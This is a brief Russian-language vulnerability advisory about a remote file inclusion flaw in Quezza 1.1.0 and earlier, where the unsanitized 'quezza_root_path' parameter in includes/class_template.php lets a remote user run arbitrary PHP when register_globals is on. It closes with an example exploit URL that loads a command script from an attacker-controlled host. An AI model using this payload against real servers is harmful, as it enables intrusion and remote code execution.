Программа: Quezza 1.1.0 и более ранние версии.
Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "quezza_root_path" в сценарии includes/class_template.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна
быть включена.
Пример:
http://[victim]/[QuezzaPath]/includes/class_template.php? quezza_root_path=http://yourhost.com/cmd.txt?